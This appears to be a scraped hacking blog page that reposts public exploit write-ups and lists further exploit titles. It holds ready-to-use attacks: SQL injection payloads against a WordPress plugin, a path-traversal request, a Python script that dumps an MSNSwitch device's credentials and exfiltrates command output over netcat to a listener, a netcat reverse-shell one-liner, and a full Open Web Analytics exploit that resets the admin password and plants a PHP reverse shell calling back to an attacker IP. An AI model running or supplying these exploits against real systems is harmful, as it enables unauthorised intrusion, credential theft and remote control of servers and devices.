# Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi
# Date: 14-08-2022
# Exploit Author: Rizacan Tufan
# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated
# Software Link: https://wordpress.org/plugins/zephyr-project-manager/
# Vendor Homepage: https://zephyr-one.com/
# Version: 3.2.42
# Tested on: Windows, Linux
# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)
# Description
Zephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.
It has been determined that the data coming from the input field in most places throughout the application are used in=20
the query without any sanitize and validation.
The details of the discovery are given below.
# Proof of Concept (PoC)=20
The details of the various SQL Injection on the application are given below.
## Endpoint of Get Project Data.
Sample Request :=20
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projects
Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
action=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7
Payload :=20
---
Parameter: project_id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7
Type: time-based blind
Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)
Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7
---
## Endpoint of Get Task Data.
Sample Request :=20
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks
Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 51
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
task_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7
Payload :=20
---
Parameter: task_id (POST)
Type: time-based blind
Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7
---
## Endpoint of New Task.
Sample Request :=20
POST /wp-admin/admin-ajax.php HTTP/2
Host: vuln.local
Cookie: ...
...
Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasks
Content-Type: application/x-www-form-urlencoded; charset=3DUTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 337
Origin: https://vuln.local
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
task_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7
Payload :=20
---
Parameter: task_project (POST)
Type: time-based blind
Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)
Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7
---
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863128677
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal
Exploit Author: Jens Regel (CRISEC IT-Security)
Date: 11/11/2022
CVE: CVE-2022-23854
Version: Access Anywhere Secure Gateway versions 2020 R2 and older
Proof of Concept:
GET
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
HTTP/1.1
HTTP/1.1 200 OK
Server: EricomSecureGateway/8.4.0.26844.*
(..)
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)
Google Dork: n/a
Date:9/1/2022
Exploit Author: Eli Fulkerson
Vendor Homepage: https://www.msnswitch.com/
Version: MNT.2408
Tested on: MNT.2408 firmware
CVE: CVE-2022-32429
#!/usr/bin/python3
"""
POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.
Configuration dump only requires HTTP access.
Full RCE requires you to be on the same subnet as the device.
"""
import requests
import sys
import urllib.parse
import readline
import random
import string
# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
LISTENER_HOST = "192.168.EDIT.ME"
LISTENER_PORT = 3434
# target msnswitch
TARGET="192.168.EDIT.ME2"
PORT=80
USERNAME = None
PASSWORD = None
"""
First vulnerability, unauthenticated configuration/credential dump
"""
if USERNAME == None or PASSWORD == None:
# lets just ask
hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh"
session = requests.session()
data = session.get(hack_url)
for each in data.text.split('\n'):
key = None
val = None
try:
key = each.strip().split('=')[0]
val = each.strip().split('=')[1]
except:
pass
if key == "Account1":
USERNAME = val
if key == "Password1":
PASSWORD = val
"""
Second vulnerability, authenticated command execution
This only works on the local lan.
for full reverse shell, modify and upload netcat busybox shell script to /tmp:
shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f
download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp
ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox
"""
session = requests.session()
# initial login, establishes our Cookie
burp0_url = f"http://{TARGET}:{PORT}/goform/login"
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD}
session.post(burp0_url, headers=burp0_headers, data=burp0_data)
# get our csrftoken
burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp"
data = session.get(burp0_url)
csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0]
while True:
CMD = input('x:')
CMD_u = urllib.parse.quote_plus(CMD)
filename = ''.join(random.choice(string.ascii_letters) for _ in range(25))
try:
hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}"
session.get(hack_url, timeout=0.01)
except requests.exceptions.ReadTimeout:
pass
# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
# Date: 2022-08-30
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://www.openwebanalytics.com/
# Software Link: https://github.com/Open-Web-Analytics
# Version: <1.7.4
# Tested on: Linux
# CVE : CVE-2022-24637
import argparse
import requests
import base64
import re
import random
import string
import hashlib
from termcolor import colored
def print_message(message, type):
if type == 'SUCCESS':
print('[' + colored('SUCCESS', 'green') + '] ' + message)
elif type == 'INFO':
print('[' + colored('INFO', 'blue') + '] ' + message)
elif type == 'WARNING':
print('[' + colored('WARNING', 'yellow') + '] ' + message)
elif type == 'ALERT':
print('[' + colored('ALERT', 'yellow') + '] ' + message)
elif type == 'ERROR':
print('[' + colored('ERROR', 'red') + '] ' + message)
def get_normalized_url(url):
if url[-1] != '/':
url += '/'
if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
url = "http://" + url
return url
def get_proxy_protocol(url):
if url[0:8].lower() == 'https://':
return 'https'
return 'http'
def get_random_string(length):
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for i in range(length))
def get_cache_content(cache_raw):
regex_cache_base64 = r'\*(\w*)\*'
regex_result = re.search(regex_cache_base64, cache_raw)
if not regex_result:
print_message('The provided URL does not appear to be vulnerable ...', "ERROR")
exit()
else:
cache_base64 = regex_result.group(1)
return base64.b64decode(cache_base64).decode("ascii")
def get_cache_username(cache):
regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'
return re.search(regex_cache_username, cache).group(1)
def get_cache_temppass(cache):
regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'
return re.search(regex_cache_temppass, cache).group(1)
def get_update_nonce(url):
try:
update_nonce_request = session.get(url, proxies=proxies)
regex_update_nonce = r'owa_nonce" value="(\w*)"'
update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)
except Exception as e:
print_message('An error occurred when attempting to update config!', "ERROR")
print(e)
exit()
else:
return update_nonce
parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')
parser.add_argument('TARGET', type=str,
help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')
parser.add_argument('ATTACKER_IP', type=str,
help='Address for reverse shell listener on attacking machine')
parser.add_argument('ATTACKER_PORT', type=str,
help='Port for reverse shell listener on attacking machine')
parser.add_argument('-u', '--username', default="admin", type=str,
help='The username to exploit (Default: admin)')
parser.add_argument('-p','--password', default=get_random_string(32), type=str,
help='The new password for the exploited user')
parser.add_argument('-P','--proxy', type=str,
help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
parser.add_argument('-c', '--check', action='store_true',
help='Check vulnerability without exploitation')
args = parser.parse_args()
base_url = get_normalized_url(args.TARGET)
login_url = base_url + "index.php?owa_do=base.loginForm"
password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"
update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"
username = args.username
new_password = args.password
reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'
shell_filename = get_random_string(8) + '.php'
shell_url = base_url + 'owa-data/caches/' + shell_filename
if args.proxy:
proxy_url = get_normalized_url(args.proxy)
proxy_protocol = get_proxy_protocol(proxy_url)
proxies = { proxy_protocol: proxy_url }
else:
proxies = {}
session = requests.Session()
try:
mainpage_request = session.get(base_url, proxies=proxies)
except Exception as e:
print_message('Could not connect to "' + base_url, "ERROR")
exit()
else:
print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")
if 'Open Web Analytics' not in mainpage_request.text:
print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")
elif 'version=1.7.3' not in mainpage_request.text:
print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")
else:
print_message('The webserver indicates a vulnerable version!', "ALERT")
try:
data = {
"owa_user_id": username,
"owa_password": username,
"owa_action": "base.login"
}
session.post(login_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred during the login attempt!', "ERROR")
print(e)
exit()
else:
print_message('Attempting to generate cache for "' + username + '" user', "INFO")
print_message('Attempting to find cache of "' + username + '" user', "INFO")
found = False
for key in range(100):
user_id = 'user_id' + str(key)
userid_hash = hashlib.md5(user_id.encode()).hexdigest()
filename = userid_hash + '.php'
cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename
cache_request = requests.get(cache_url, proxies=proxies)
if cache_request.status_code != 200:
continue;
cache_raw = cache_request.text
cache = get_cache_content(cache_raw)
cache_username = get_cache_username(cache)
if cache_username != username:
print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")
continue;
else:
found = True
break
if not found:
print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")
exit()
cache_temppass = get_cache_temppass(cache)
print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")
if args.check:
print_message('The system appears to be vulnerable!', "ALERT")
exit()
try:
data = {
"owa_password": new_password,
"owa_password2": new_password,
"owa_k": cache_temppass,
"owa_action":
"base.usersChangePassword"
}
session.post(password_reset_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred when changing the user password!', "ERROR")
print(e)
exit()
else:
print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")
try:
data = {
"owa_user_id": username,
"owa_password": new_password,
"owa_action": "base.login"
}
session.post(login_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred during the login attempt!', "ERROR")
print(e)
exit()
else:
print_message('Logged in as "' + username + '" user', "SUCCESS")
nonce = get_update_nonce(update_config_url)
try:
log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename
data = {
"owa_nonce": nonce,
"owa_action": "base.optionsUpdate",
"owa_config[base.error_log_file]": log_location,
"owa_config[base.error_log_level]": 2
}
session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred when attempting to update config!', "ERROR")
print(e)
exit()
else:
print_message('Creating log file', "INFO")
nonce = get_update_nonce(update_config_url)
try:
data = {
"owa_nonce": nonce,
"owa_action": "base.optionsUpdate",
"owa_config[shell]": reverse_shell
}
session.post(update_config_url, data=data, proxies=proxies)
except Exception as e:
print_message('An error occurred when attempting to update config!', "ERROR")
print(e)
exit()
else:
print_message('Wrote payload to log file', "INFO")
try:
session.get(shell_url, proxies=proxies)
except Exception as e:
print(e)
else:
print_message('Triggering payload! Check your listener!', "SUCCESS")
print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")
- Read more...
- 0 comments
- 1 view
pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
CVAT 2.0 - Server Side Request Forgery
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Linksys AX3200 V1.1.00 - Command Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
WorkOrder CMS 0.1.0 - SQL Injection
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view
Bitbucket v7.0.0 - RCE
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
System Mechanic v15.5.0.61 - Arbitrary Read/Write
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Human Resources Management System v1.0 - Multiple SQLi
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
IOTransfer V4 - Unquoted Service Path
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
SmartRG Router SR510n 2.6.13 - Remote Code Execution
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
SoX 14.4.2 - Denial Of Service
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
MAN-EAM-0003 V3.2.4 - XXE
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
"camp" Raspberry Pi camera server 1.0 - Authentication Bypass
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
wkhtmltopdf 0.12.6 - Server Side Request Forgery
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
Yoga Class Registration System v1.0 - Multiple SQLi
HACKER · %s · %s
- Read more...
- 0 comments
- 1 view
- Read more...
- 0 comments
- 1 view